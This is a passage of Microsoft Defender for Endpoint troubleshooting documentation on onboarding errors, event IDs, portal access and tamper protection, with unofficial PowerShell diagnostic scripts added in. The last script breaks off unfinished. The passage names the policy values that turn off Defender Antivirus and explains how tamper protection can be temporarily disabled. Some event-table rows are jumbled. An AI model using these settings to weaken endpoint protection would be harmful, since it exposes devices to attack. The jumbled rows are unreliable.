Troubleshooting steps: Ensure that the following registry key exists:
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection
If it doesn't exist, open an elevated command prompt and add the key.

Error code 0x87D1FDE8 (decimal -2016281112), Remediation failed. OMA-URI: SenseIsRunning,
OnboardingState, OrgId.
Possible cause: An attempt to remediate by read-only property. Onboarding has failed.
Troubleshooting steps: Check the troubleshooting steps in Troubleshoot onboarding issues on the device.
Check the MDM event logs in the following table or follow the instructions in Diagnose MDM failures in
Windows.

Error code 0x87D1FDE8 (decimal -2016281112), Remediation failed. OMA-URI: All.
Possible cause: Attempt to deploy Microsoft Defender for Endpoint on non-supported SKU/Platform,
particularly Holographic SKU.
Currently supported platforms: Enterprise, Education, and Professional. Server isn't supported.

Error code 0x87D101A9 (decimal -2016345687), SyncML(425): The requested command failed because the
sender doesn't have adequate access control permissions (ACL) on the recipient. OMA-URI: All.
Possible cause: Attempt to deploy Microsoft Defender for Endpoint on non-supported SKU/Platform,
particularly Holographic SKU.
Currently supported platforms: Enterprise, Education, and Professional.
Known issues with non-compliance
The following table provides information on issues with non-compliance and how you can address the
issues.

Case 1
Symptoms: Device is compliant by SenseIsRunning OMA-URI, but is non-compliant by OrgId, Onboarding
and OnboardingState OMA-URIs.
Possible cause: Check that user passed OOBE after Windows installation or upgrade. During OOBE
onboarding couldn't be completed but SENSE is running already.
Troubleshooting steps: Wait for OOBE to complete.

Case 2
Symptoms: Device is compliant by OrgId, Onboarding, and OnboardingState OMA-URIs, but is non-compliant
by SenseIsRunning OMA-URI.
Possible cause: Sense service's startup type is set as "Delayed Start". Sometimes this causes the
Microsoft Intune server to report the device as non-compliant by SenseIsRunning when DM session
occurs on system start.
Troubleshooting steps: The issue should automatically be fixed within 24 hours.

Case 3
Symptoms: Device is non-compliant.
Troubleshooting steps: Ensure that Onboarding and Offboarding policies aren't deployed on the same
device at the same time.

Mobile Device Management (MDM) event logs
View the MDM event logs to troubleshoot issues that might arise during onboarding:

Log name: Microsoft\Windows\DeviceManagement-EnterpriseDiagnostics-Provider

Channel name: Admin

Event ID 1819 (Error): Microsoft Defender for Endpoint CSP: Failed to Set Node's Value. NodeId: (%1),
TokenName: (%2), Result: (%3).
Troubleshooting steps: Download the Cumulative Update for Windows 10, 1607.

Troubleshoot onboarding issues on the device
If the deployment tools used don't indicate an error in the onboarding process, but devices still aren't
appearing in the devices list within an hour, go through the following verification topics to check if an
error occurred with the Microsoft Defender for Endpoint agent.

View agent onboarding errors in the device event log
Ensure the diagnostic data service is enabled
Ensure the service is set to start
Ensure the device has an Internet connection
Ensure that Microsoft Defender Antivirus is not disabled by a policy

View agent onboarding errors in the device event log

1. Click Start, type Event Viewer, and press Enter.

2. In the Event Viewer (Local) pane, expand Applications and Services Logs > Microsoft > Windows
> SENSE.

Note

SENSE is the internal name used to refer to the behavioral sensor that powers Microsoft
Defender for Endpoint.

3. Select Operational to load the log.

4. In the Action pane, click Filter Current log.

5. On the Filter tab, under Event level: select Critical, Warning, and Error, and click OK.

6. Events which can indicate issues appear in the Operational pane. You can attempt to troubleshoot
them based on the solutions in the following table:

Event ID 5: Microsoft Defender for Endpoint service failed to connect to the server at variable.
Resolution steps: Ensure the device has Internet access.

Event ID 6: Microsoft Defender for Endpoint service isn't onboarded and no onboarding parameters were
found. Failure code: variable.
Resolution steps: Run the onboarding script again.

Event ID 7: Microsoft Defender for Endpoint service failed to read the onboarding parameters. Failure
code: variable.
Resolution steps: Ensure the device has Internet access, then run the entire onboarding process again.

Event ID 9: Microsoft Defender for Endpoint service failed to change its start type. Failure code:
variable.
Resolution steps: If the event happened during onboarding, reboot and re-attempt running the
onboarding script. For more information, see Run the onboarding script again. If the event happened
during offboarding, contact support.

Event ID 10: Microsoft Defender for Endpoint service failed to persist the onboarding information.
Failure code: variable.
Resolution steps: If the event happened during onboarding, re-attempt running the onboarding script.
For more information, see Run the onboarding script again. If the problem persists, contact support.

Event ID 15: Microsoft Defender for Endpoint can't start command channel with URL: variable.
Resolution steps: Ensure the device has Internet access.

Event ID 17: Microsoft Defender for Endpoint service failed to change the Connected User Experiences
and Telemetry service location. Failure code: variable.
Resolution steps: Run the onboarding script again. If the problem persists, contact support.

Event ID 25: Microsoft Defender for Endpoint service failed to reset health status in the registry.
Failure code: variable.
Resolution steps: Contact support.

Event ID 27: Failed to enable Microsoft Defender for Endpoint mode in Windows Defender. Onboarding
process failed. Failure code: variable.
Resolution steps: Contact support.

Event ID 29: Failed to read the offboarding parameters. Error type: %1, Error code: %2, Description: %3.
Resolution steps: Ensure the device has Internet access, then run the entire offboarding process again.

Event ID 30: Failed to disable $(build.sense.productDisplayName) mode in Microsoft Defender for
Endpoint. Failure code: %1.
Resolution steps: Contact support.

32 $(build.sense.productDisplayName) service failed to Verify that the service start type is manual
request to stop itself after offboarding process. Failure and reboot the device.
code: %1

55 Failed to create the Secure ETW autologger. Failure code: Reboot the device.
%1
Event Message Resolution steps
ID

63 Updating the start type of external service. Name: %1, Identify what is causing changes in start type
actual start type: %2, expected start type: %3, exit code: %4 of mentioned service. If the exit code isn't 0,
fix the start type manually to expected start
type.

64 Starting stopped external service. Name: %1, exit code: %2 Contact support if the event keeps re-
appearing.

68 The start type of the service is unexpected. Service name: Identify what is causing changes in start
%1, actual start type: %2, expected start type: %3 type. Fix mentioned service start type.

69 The service is stopped. Service name: %1 Start the mentioned service. Contact support
if the issue persists.
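The Event Viewer walk-through above, together with the MDM event log check earlier on this page, can be scripted. The following PowerShell is an added example, not code from the Microsoft documentation: it pulls Critical, Warning and Error events from the SENSE Operational log and the MDM diagnostics Admin log and annotates the event IDs from the two tables with their documented resolution steps. The Get-WinEvent name used for the MDM channel is assumed from the Event Viewer path given above.

```powershell
# Added example, not from the Microsoft documentation. Run in an elevated PowerShell session
# on the device that fails to onboard. Only the event IDs documented in the tables on this
# page are annotated; anything else is listed with an empty Resolution column.

# SENSE Operational log: event ID -> resolution steps from the table above.
$SenseResolutions = @{
    5  = 'Ensure the device has Internet access.'
    6  = 'Run the onboarding script again.'
    7  = 'Ensure the device has Internet access, then run the entire onboarding process again.'
    9  = 'During onboarding: reboot and re-run the onboarding script. During offboarding: contact support.'
    10 = 'Re-run the onboarding script. If the problem persists, contact support.'
    15 = 'Ensure the device has Internet access.'
    17 = 'Run the onboarding script again. If the problem persists, contact support.'
    25 = 'Contact support.'
    27 = 'Contact support.'
    29 = 'Ensure the device has Internet access, then run the entire offboarding process again.'
    30 = 'Contact support.'
    32 = 'Verify that the service start type is manual and reboot the device.'
    55 = 'Reboot the device.'
    63 = 'Identify what changes the start type of the named service; if the exit code is not 0, fix the start type manually.'
    64 = 'Contact support if the event keeps reappearing.'
    68 = 'Identify what changes the start type; fix the named service start type.'
    69 = 'Start the named service. Contact support if the issue persists.'
}

# MDM diagnostics Admin log: event ID -> resolution steps from the MDM table above.
$MdmResolutions = @{
    1819 = 'Download the Cumulative Update for Windows 10, 1607.'
}

# Log names as Get-WinEvent expects them. The MDM name is an assumption derived from the
# Event Viewer path on this page (DeviceManagement-Enterprise-Diagnostics-Provider > Admin).
$Logs = @(
    @{ Source = 'SENSE'; LogName = 'Microsoft-Windows-SENSE/Operational'; Map = $SenseResolutions }
    @{ Source = 'MDM';   LogName = 'Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider/Admin'; Map = $MdmResolutions }
)

function Get-MdeOnboardingEvents {
    param(
        # Look-back window; onboarding problems normally surface within the first hour.
        [datetime]$Since = (Get-Date).AddDays(-1)
    )
    foreach ($log in $Logs) {
        # Level 1 = Critical, 2 = Error, 3 = Warning, matching the Event Viewer filter above.
        $filter = @{ LogName = $log.LogName; Level = 1, 2, 3; StartTime = $Since }
        $events = Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue
        foreach ($e in $events) {
            [pscustomobject]@{
                Source      = $log.Source
                TimeCreated = $e.TimeCreated
                Id          = $e.Id
                Level       = $e.LevelDisplayName
                # The first line of the message is enough to match it against the table.
                Message     = ($e.Message -split "`r?`n")[0]
                Resolution  = $log.Map[[int]$e.Id]
            }
        }
    }
}

# Most recent first; -Wrap keeps the long resolution text readable.
Get-MdeOnboardingEvents | Sort-Object TimeCreated -Descending | Format-Table -AutoSize -Wrap
```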

There are additional components on the device that the Microsoft Defender for Endpoint agent
depends on to function properly. If there are no onboarding related errors in the Microsoft Defender for
Endpoint agent event log, proceed with the following steps to ensure that the additional components
are configured correctly.

Ensure the diagnostic data service is enabled

Note

In Windows 10 build 1809 and later, the Defender for Endpoint EDR service no longer has a direct
dependency on the DiagTrack service. The EDR cyber evidence can still be uploaded if this service is
not running.

If the devices aren't reporting correctly, you might need to check that the Windows diagnostic data
service is set to automatically start and is running on the device. The service might have been disabled
by other programs or user configuration changes.

First, you should check that the service is set to start automatically when Windows starts, then you
should check that the service is currently running (and start it if it isn't).

Ensure the service is set to start


Use the command line to check the Windows diagnostic data service startup type:

1. Open an elevated command-line prompt on the device:

a. Click Start, type cmd, and press Enter.

b. Right-click Command prompt and select Run as administrator.

2. Enter the following command, and press Enter:

sc qc diagtrack

If the service is enabled, the output reports a START_TYPE of AUTO_START.

If the START_TYPE isn't set to AUTO_START, then you need to set the service to automatically start.

Use the command line to set the Windows diagnostic data service to automatically start:

1. Open an elevated command-line prompt on the device:

a. Click Start, type cmd, and press Enter.

b. Right-click Command prompt and select Run as administrator.

2. Enter the following command, and press Enter:

sc config diagtrack start=auto

3. A success message is displayed. Verify the change by entering the following command, and press
Enter:

sc qc diagtrack

4. Start the service. In the command prompt, type the following command and press Enter:

sc start diagtrack

Ensure the device has an Internet connection


The Microsoft Defender for Endpoint sensor requires Microsoft Windows HTTP (WinHTTP) to report
sensor data and communicate with the Microsoft Defender for Endpoint service.

WinHTTP is independent of the Internet browsing proxy settings and other user context applications
and must be able to detect the proxy servers that are available in your particular environment.

To ensure that the sensor has service connectivity, follow the steps described in the Verify client connectivity
to Microsoft Defender for Endpoint service URLs topic.

If the verification fails and your environment is using a proxy to connect to the Internet, then follow the
steps described in Configure proxy and Internet connectivity settings topic.

Ensure that Microsoft Defender Antivirus is not disabled by a policy

Important

The following only applies to devices that have not yet received the August 2020 (version
4.18.2007.8) update to Microsoft Defender Antivirus.

The update ensures that Microsoft Defender Antivirus cannot be turned off on client devices via
system policy.

Problem: The Microsoft Defender for Endpoint service doesn't start after onboarding.

Symptom: Onboarding successfully completes, but you see error 577 or error 1058 when trying to start
the service.

Solution: If your devices are running a third-party antimalware client, the Microsoft Defender for
Endpoint agent needs the Early Launch Antimalware (ELAM) driver to be enabled. You must ensure that
it's not turned off by a system policy.

Depending on the tool that you use to implement policies, you need to verify that the following
Windows Defender policies are cleared:

DisableAntiSpyware
DisableAntiVirus

For example, in Group Policy there should be no entries such as the following values:

<Key Path="SOFTWARE\Policies\Microsoft\Windows Defender"><KeyValue Value="0" ValueKind="DWord" Name="DisableAntiSpyware"/></Key>

<Key Path="SOFTWARE\Policies\Microsoft\Windows Defender"><KeyValue Value="0" ValueKind="DWord" Name="DisableAntiVirus"/></Key>

Important

The disableAntiSpyware setting is discontinued and will be ignored on all Windows 10 devices, as
of the August 2020 (version 4.18.2007.8) update to Microsoft Defender Antivirus.

After clearing the policy, run the onboarding steps again.


You can also check the previous registry key values to verify that the policy is disabled, by opening
the registry key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender.

Note

All Windows Defender services (wdboot, wdfilter, wdnisdrv, wdnissvc, and windefend) should
be in their default state. Changing the startup of these services is unsupported and may force
you to reimage your system.

Example default configurations for WdBoot and WdFilter:

<Key Path="SYSTEM\CurrentControlSet\Services\WdBoot"><KeyValue Value="0" ValueKind="DWord" Name="Start"/></Key>

<Key Path="SYSTEM\CurrentControlSet\Services\WdFilter"><KeyValue Value="0" ValueKind="DWord" Name="Start"/></Key>
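The DiagTrack checks from the sc procedure above and the policy and driver checks from this section, combined into one PowerShell function. This is an added example, not code from the Microsoft documentation; it reports on the policy values and Windows Defender driver start values only, because changing those services is unsupported.

```powershell
# Added example, not from the Microsoft documentation. Run elevated. Reports each check that
# fails; with -Repair it also applies the two supported fixes from the sc procedure above
# (set DiagTrack to automatic start and start it). Policy values and Windows Defender service
# start values are reported only, because changing those services is unsupported.

function Test-MdeOnboardingPrerequisites {
    [CmdletBinding()]
    param([switch]$Repair)

    $findings = [System.Collections.Generic.List[string]]::new()

    # 1. Windows diagnostic data service: START_TYPE must be AUTO_START and the service running.
    $svc = Get-CimInstance -ClassName Win32_Service -Filter "Name='DiagTrack'"
    if ($null -eq $svc) {
        $findings.Add('DiagTrack service not found on this device.')
    } else {
        if ($svc.StartMode -ne 'Auto') {
            $findings.Add("DiagTrack start type is '$($svc.StartMode)', expected 'Auto' (sc config diagtrack start=auto).")
            if ($Repair) { Set-Service -Name DiagTrack -StartupType Automatic }
        }
        if ($svc.State -ne 'Running') {
            $findings.Add("DiagTrack state is '$($svc.State)', expected 'Running' (sc start diagtrack).")
            if ($Repair) { Start-Service -Name DiagTrack }
        }
    }

    # 2. Policies that turn off Microsoft Defender Antivirus. The page says these entries should
    #    be cleared (absent) before onboarding; a non-zero value disables the antivirus on
    #    platforms older than 4.18.2007.8.
    $policyKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender'
    foreach ($name in 'DisableAntiSpyware', 'DisableAntiVirus') {
        $value = (Get-ItemProperty -Path $policyKey -Name $name -ErrorAction SilentlyContinue).$name
        if ($null -ne $value) {
            $findings.Add("Policy value $name=$value is present under $policyKey; clear it and re-run onboarding.")
        }
    }

    # 3. Windows Defender services must keep their default configuration. The page gives
    #    Start=0 (boot start) as the default for the WdBoot and WdFilter drivers.
    foreach ($driver in 'WdBoot', 'WdFilter') {
        $start = (Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\$driver" -Name Start -ErrorAction SilentlyContinue).Start
        if ($start -ne 0) {
            $findings.Add("$driver Start value is '$start', expected default 0. Changing it manually is unsupported; the system may need reimaging.")
        }
    }

    if ($findings.Count -eq 0) { 'All checked onboarding prerequisites are in the expected state.' }
    else { $findings }
}

Test-MdeOnboardingPrerequisites
```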

Troubleshoot onboarding issues

Note

The following troubleshooting guidance is only applicable for Windows Server 2016 and lower.

If you encounter issues while onboarding a server, go through the following verification steps to address
possible issues.

Ensure Microsoft Monitoring Agent (MMA) is installed and configured to report sensor data to the service
Ensure that the server proxy and Internet connectivity settings are configured properly

You might also need to check the following:

Check that there's a Microsoft Defender for Endpoint Service running in the Processes tab in Task
Manager.

Check Event Viewer > Applications and Services Logs > Operation Manager to see if there are
any errors.

In Services, check if the Microsoft Monitoring Agent is running on the server.

In Microsoft Monitoring Agent > Azure Log Analytics (OMS), check the Workspaces and verify
that the status is running.

Check to see that devices are reflected in the Devices list in the portal.
Confirming onboarding of newly built devices

There may be instances when onboarding is deployed on a newly built device but not completed.

The steps below provide guidance for the following scenario:

Onboarding package is deployed to newly built devices
Sensor doesn't start because the Out-of-box experience (OOBE) or first user logon hasn't been completed
Device is turned off or restarted before the end user performs a first logon
In this scenario, the SENSE service won't start automatically even though onboarding package was deployed

Note

User Logon after OOBE is no longer required for SENSE service to start on the following or more
recent Windows versions: Windows 10, version 1809 or Windows Server 2019, or Windows Server
2022 with April 22 2021 update rollup. Windows 10, version 1909 with April 2021 update
rollup. Windows 10, version 2004/20H2 with April 28 2021 update rollup.

Note

The following steps are only relevant when using Microsoft Endpoint Configuration Manager. For
more information about onboarding using Microsoft Endpoint Configuration Manager, see
Microsoft Defender for Endpoint.

1. Create an application in Microsoft Endpoint Configuration Manager.

2. Select Manually specify the application information.

3. Specify information about the application, then select Next.

4. Specify information about the software center, then select Next.

5. In Deployment types select Add.

6. Select Manually specify the deployment type information, then select Next.

7. Specify information about the deployment type, then select Next.

8. In Content > Installation program specify the command: net start sense.

9. In Detection method, select Configure rules to detect the presence of this deployment type, then
select Add Clause.

10. Specify the following detection rule details, then select OK:

11. In Detection method select Next.

12. In User Experience, specify the following information, then select Next:

13. In Requirements, select Next.

14. In Dependencies, select Next.

15. In Summary, select Next.

16. In Completion, select Close.

17. In Deployment types, select Next.

18. In Summary, select Next.

The status is then displayed:

19. In Completion, select Close.

20. You can now deploy the application by right-clicking the app and selecting Deploy.

21. In General select Automatically distribute content for dependencies and Browse.

22. In Content select Next.

23. In Deployment settings, select Next.

24. In Scheduling select As soon as possible after the available time, then select Next.

25. In User experience, select Commit changes at deadline or during a maintenance window
(requires restarts), then select Next.

26. In Alerts select Next.

27. In Summary, select Next.

The status is then displayed.

28. In Completion, select Close.


Related topics
Troubleshoot Microsoft Defender for Endpoint
Onboard devices
Configure device proxy and Internet connectivity settings

 Tip

Do you want to learn more? Engage with the Microsoft Security community in our Tech
Community: Microsoft Defender for Endpoint Tech Community.



Troubleshoot subscription and portal
access issues
Article • 11/15/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

This page provides detailed steps to troubleshoot issues that might occur when setting
up your Microsoft Defender for Endpoint service.

If you receive an error message, Microsoft Defender XDR will provide a detailed
explanation on what the issue is and relevant links will be supplied.

No subscriptions found

If while accessing Microsoft Defender XDR you get a No subscriptions found message,
it means the Microsoft Entra ID used to log in the user to the portal does not have a
Microsoft Defender for Endpoint license.

Potential reasons:

The Windows E5 and Office E5 licenses are separate licenses.
The license was purchased but not provisioned to this Microsoft Entra instance.
  It could be a license provisioning issue.
  It could be you inadvertently provisioned the license to a different Microsoft
  Entra ID than the one used for authentication into the service.

For both cases, you should contact Microsoft support at General Microsoft Defender for
Endpoint Support or Volume license support.

Your subscription has expired

If while accessing Microsoft Defender XDR you get a Your subscription has expired
message, your online service subscription has expired. Microsoft Defender for Endpoint
subscription, like any other online service subscription, has an expiration date.

You can choose to renew or extend the license at any point in time. When accessing the
portal after the expiration date a Your subscription has expired message will be
presented with an option to download the device offboarding package, should you
choose to not renew the license.

Note

For security reasons, the package used to Offboard devices will expire 30 days after
the date it was downloaded. Expired offboarding packages sent to a device will be
rejected. When downloading an offboarding package you will be notified of the
package's expiry date and it will also be included in the package name.


You are not authorized to access the portal

If you receive a You are not authorized to access the portal message, be aware that Microsoft
Defender for Endpoint is a security monitoring, incident investigation and response
product, and as such, access to it is restricted and controlled by the user. For more
information, see Assign user access to the portal.

Data currently isn't available on some sections of the portal

If the portal dashboard and other sections show an error message such as "Data
currently isn't available":

You'll need to allow the security.windows.com and all subdomains under it on your web
browser. For example, *.security.windows.com.
Portal communication issues

If you encounter issues with accessing the portal, missing data, or restricted access to
portions of the portal, you'll need to verify that the following URLs are allowed and open
for communication.

*.blob.core.windows.net
crl.microsoft.com
https://*.microsoftonline-p.com
https://*.security.microsoft.com
https://automatediracs-eus-prd.security.microsoft.com
https://login.microsoftonline.com
https://login.windows.net
https://onboardingpackagescusprd.blob.core.windows.net
https://secure.aadcdn.microsoftonline-p.com
https://security.microsoft.com
https://static2.sharepointonline.com


Troubleshoot onboarding issues related
to Security Management for Microsoft
Defender for Endpoint
Article • 12/15/2023

Applies to:

Manage Microsoft Defender for Endpoint on devices with Microsoft Intune
Microsoft Defender for Endpoint
Microsoft Defender XDR
Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2

Security Management for Microsoft Defender for Endpoint is a capability for devices
that aren't managed by Microsoft Intune to receive security configurations. For more
information on Security Management for Microsoft Defender for Endpoint, see Manage
Microsoft Defender for Endpoint on devices with Microsoft Intune.

For Security Management for Microsoft Defender for Endpoint onboarding instructions,
see Microsoft Defender for Endpoint Security Configuration Management.

For more information about the client analyzer, see Troubleshoot sensor health using
Microsoft Defender for Endpoint Client Analyzer.

Run Microsoft Defender for Endpoint Client Analyzer on Windows

Consider running the Client Analyzer on endpoints that are failing to complete the
Security Management for Microsoft Defender for Endpoint onboarding flow. For more
information about the client analyzer, see Troubleshoot sensor health using Microsoft
Defender for Endpoint Client Analyzer.

The Client Analyzer output file (MDE Client Analyzer Results.htm) can provide key
troubleshooting information:

Verify that the device OS is in scope for Security Management for Microsoft
Defender for Endpoint onboarding flow in General Device Details section

Verify that the device appears in Microsoft Entra ID in Device Configuration
Management Details

In the Detailed Results section of the report, the Client Analyzer also provides
actionable guidance.

 Tip

Make sure the Detailed Results section of the report does not include any "Errors",
and make sure to review all "Warning" messages.

General troubleshooting

If you weren't able to identify the onboarded device in Microsoft Entra ID or in the
Intune admin center, and didn't receive an error during the enrollment, checking the
registry key Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SenseCM\EnrollmentStatus can
provide additional troubleshooting information.

The following table lists errors and directions on what to try/check in order to address
the error. Note that the list of errors isn't complete and is based on typical/common
errors encountered by customers in the past:

Error Code | Enrollment Status | Administrator Actions
5-7, 9, 11-12, 26-33 | General error | The device was successfully onboarded to Microsoft Defender for Endpoint. However, there was an error in the security configuration management flow. This could be due to the device not meeting prerequisites for Microsoft Defender for Endpoint management channel. Running the Client Analyzer on the device can help identify the root cause of the issue. If this doesn't help, contact support.
8, 44 | Microsoft Intune Configuration issue | The device was successfully onboarded to Microsoft Defender for Endpoint. However, Microsoft Intune hasn't been configured through the Admin Center to allow Microsoft Defender for Endpoint Security Configuration. Make sure the Microsoft Intune tenant is configured and the feature is turned on.
13-14, 20, 24, 25 | Connectivity issue | The device was successfully onboarded to Microsoft Defender for Endpoint. However, there was an error in the security configuration management flow, which could be due to a connectivity issue. Verify that the Microsoft Entra ID and Microsoft Intune endpoints are opened in your firewall.
10, 42 | General Hybrid join failure | The device was successfully onboarded to Microsoft Defender for Endpoint. However, there was an error in the security configuration management flow and the OS failed to perform hybrid join. Use Troubleshoot Microsoft Entra hybrid joined devices for troubleshooting OS-level hybrid join failures.
15 | Tenant mismatch | The device was successfully onboarded to Microsoft Defender for Endpoint. However, there was an error in the security configuration management flow because your Microsoft Defender for Endpoint tenant ID doesn't match your Microsoft Entra tenant ID. Make sure that the Microsoft Entra tenant ID from your Defender for Endpoint tenant matches the tenant ID in the SCP entry of your domain. For more details, see Troubleshoot onboarding issues related to Security Management for Microsoft Defender for Endpoint.
16, 17 | Hybrid error - Service Connection Point | The device was successfully onboarded to Microsoft Defender for Endpoint. However, Service Connection Point (SCP) record isn't configured correctly and the device couldn't be joined to Microsoft Entra ID. This could be due to the SCP being configured to join Enterprise DRS. Make sure the SCP record points to Microsoft Entra ID and SCP is configured following best practices. For more information, see Configure a service connection point.
18 | Certificate error | The device was successfully onboarded to Microsoft Defender for Endpoint. However, there was an error in the security configuration management flow due to a device certificate error. The device certificate belongs to a different tenant. Verify that best practices are followed when creating trusted certificate profiles.
36, 37 | Microsoft Entra Connect misconfiguration | The device was successfully onboarded to Microsoft Defender for Endpoint. However, there was an error in the security configuration management flow due to a misconfiguration in Microsoft Entra Connect. To identify what is preventing the device from registering to Microsoft Entra ID, consider running the Device Registration Troubleshooter Tool. For Windows Server 2012 R2, run the dedicated troubleshooting instructions.
38, 41 | DNS error | The device was successfully onboarded to Microsoft Defender for Endpoint. However, there was an error in the security configuration management flow due to a DNS error. Check the internet connection and/or DNS settings on the device. The invalid DNS settings might be on the workstation's side. Active Directory requires you to use domain DNS to work properly (and not the router's address). For more information, see Troubleshoot onboarding issues related to Security Management for Microsoft Defender for Endpoint.
40 | Clock sync issue | The device was successfully onboarded to Microsoft Defender for Endpoint. However, there was an error in the security configuration management flow. Verify that the clock is set correctly and is synced on the device where the error occurs.
43 | MDE and ConfigMgr | The device is managed using Configuration Manager and Microsoft Defender for Endpoint. Controlling policies through both channels may cause conflicts and undesired results. To avoid this, endpoint security policies should be isolated to a single control plane.
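The EnrollmentStatus lookup described under General troubleshooting, scripted against the error-code table above. This is an added example, not code from the Microsoft documentation; it reads the SenseCM\EnrollmentStatus value and reports the documented category and administrator action, and it treats codes the table does not list as unknown rather than guessing.

```powershell
# Added example, not from the Microsoft documentation. Reads SenseCM\EnrollmentStatus (the
# registry value named under "General troubleshooting" above) and looks it up in the
# error-code table. The table is not complete, so codes it does not list are reported as
# "Not listed" rather than guessed at.

# Error code ranges and administrator actions, condensed from the table above.
$EnrollmentStatusTable = @(
    @{ Codes = @(5, 6, 7, 9, 11, 12) + (26..33); Status = 'General error'
       Action = 'Device onboarded; error in the security configuration management flow. Run the Client Analyzer; if that does not help, contact support.' }
    @{ Codes = @(8, 44); Status = 'Microsoft Intune Configuration issue'
       Action = 'Intune is not configured to allow Defender for Endpoint Security Configuration. Configure the Intune tenant and turn the feature on.' }
    @{ Codes = @(13, 14, 20, 24, 25); Status = 'Connectivity issue'
       Action = 'Verify that the Microsoft Entra ID and Microsoft Intune endpoints are open in your firewall.' }
    @{ Codes = @(10, 42); Status = 'General Hybrid join failure'
       Action = 'The OS failed to perform hybrid join; troubleshoot Microsoft Entra hybrid joined devices at OS level.' }
    @{ Codes = @(15); Status = 'Tenant mismatch'
       Action = 'Defender for Endpoint tenant ID does not match the Microsoft Entra tenant ID; check the SCP entry of your domain.' }
    @{ Codes = @(16, 17); Status = 'Hybrid error - Service Connection Point'
       Action = 'SCP record is not configured correctly (possibly pointing to Enterprise DRS); make sure it points to Microsoft Entra ID.' }
    @{ Codes = @(18); Status = 'Certificate error'
       Action = 'Device certificate belongs to a different tenant; verify the trusted certificate profiles.' }
    @{ Codes = @(36, 37); Status = 'Microsoft Entra Connect misconfiguration'
       Action = 'Run the Device Registration Troubleshooter Tool (dedicated instructions for Windows Server 2012 R2).' }
    @{ Codes = @(38, 41); Status = 'DNS error'
       Action = 'Check the internet connection and DNS settings; the device must use domain DNS, not the router address.' }
    @{ Codes = @(40); Status = 'Clock sync issue'
       Action = 'Verify that the clock is set correctly and synced on the device.' }
    @{ Codes = @(43); Status = 'MDE and ConfigMgr'
       Action = 'Device is managed by both Configuration Manager and Defender for Endpoint; isolate endpoint security policies to a single control plane.' }
)

function Resolve-SenseCMEnrollmentStatus {
    param(
        # Pass a code explicitly to look it up; omit it to read the value from the registry.
        [int]$Code = -1
    )
    if ($Code -lt 0) {
        $raw = (Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\SenseCM' `
                    -Name EnrollmentStatus -ErrorAction SilentlyContinue).EnrollmentStatus
        if ($null -eq $raw) {
            return [pscustomobject]@{ Code = $null; Status = 'Value not present'
                Action = 'SenseCM\EnrollmentStatus does not exist on this device; run the Client Analyzer and review its Detailed Results.' }
        }
        $Code = [int]$raw
    }
    $row = $EnrollmentStatusTable | Where-Object { $_.Codes -contains $Code } | Select-Object -First 1
    if ($null -eq $row) {
        $row = @{ Status = 'Not listed'
                  Action = 'This code is not in the documented table; run the Client Analyzer and contact support.' }
    }
    [pscustomobject]@{ Code = $Code; Status = $row.Status; Action = $row.Action }
}

Resolve-SenseCMEnrollmentStatus | Format-List
```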

Related topic
Manage Microsoft Defender for Endpoint on devices with Microsoft Intune


Troubleshoot problems with tamper protection

FAQ

Tamper protection is preventing my security team from managing a device. What should we do?

If tamper protection prevents your IT or security team from performing a necessary task
on a device, consider using troubleshooting mode. After troubleshooting mode ends,
any changes made to tamper-protected settings are reverted to their configured state.

Changes to Microsoft Defender Antivirus settings using Group Policy are ignored. Why is this happening, and what can we do about it?

If you're using Group Policy to manage Microsoft Defender Antivirus settings, keep in
mind that tamper protection can block changes to certain settings in Microsoft
Defender Antivirus. When you use Group Policy to make changes to Microsoft Defender
Antivirus settings and the tamper protection is on, changes to tamper-protected
settings are ignored. For more information, see What happens when tamper protection
is turned on?

Depending on your particular scenario, you have several options available:

If you must make changes to a device and tamper protection is blocking those
changes, you can use troubleshooting mode to temporarily disable tamper
protection on the device. After troubleshooting mode ends, any changes made to
tamper-protected settings are reverted to their configured state.

You can use Intune or Configuration Manager to exclude devices from tamper
protection.

How do we protect exclusions for Microsoft Defender Antivirus?

1. Ensure that all of the following requirements are met:

Devices are running Windows Defender platform 4.18.2211.5 or later. (See Monthly platform and engine versions.)
DisableLocalAdminMerge is enabled. (See DisableLocalAdminMerge.)
Tamper protection is deployed through Intune, and only Intune is used to manage devices.
Microsoft Defender Antivirus exclusions are managed in Microsoft Intune. (See Settings for Microsoft Defender Antivirus policy in Microsoft Intune for Windows devices.)

2. Confirm that only Intune manages the device. Go to
Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender (or
HKLM\SOFTWARE\Microsoft\Windows Defender), and look for a REG_DWORD entry called
ManagedDefenderProductType.

If ManagedDefenderProductType has a value of 6, then the device is managed by Intune only
(this value is required to protect Microsoft Defender Antivirus exclusions).

If ManagedDefenderProductType has a value of 7, then the device is comanaged, such as by
Intune and Configuration Manager (this value indicates that exclusions aren't currently
tamper protected).

3. Confirm that tamper protection is deployed and that Microsoft Defender Antivirus
exclusions are protected. Go to
Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features (or
HKLM\SOFTWARE\Microsoft\Windows Defender\Features), and look for a REG_DWORD
entry called TPExclusions.

If TPExclusions has a value of 1, then all required conditions are met, and the
new functionality to protect exclusions is enabled on the device. In this case,
exclusions are tamper protected.

If TPExclusions has a value of 0, then tamper protection isn't currently
protecting exclusions on the device. (If you meet all the requirements and this
state seems incorrect, contact support.)

Caution

Don't change the value of the registry keys. Use the preceding procedure for
information only. Changing the keys has no effect on whether tamper protection
applies to exclusions.
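The three-step check above as a read-only PowerShell function. This is an added example, not code from the Microsoft documentation; it reads ManagedDefenderProductType and TPExclusions without modifying them, and uses Get-MpComputerStatus and Get-MpPreference from the Defender module to cover the platform version and DisableLocalAdminMerge requirements from step 1.

```powershell
# Added example, not from the Microsoft documentation. Read-only: it reads the two registry
# values from the procedure above and never writes to the registry, in line with the Caution.
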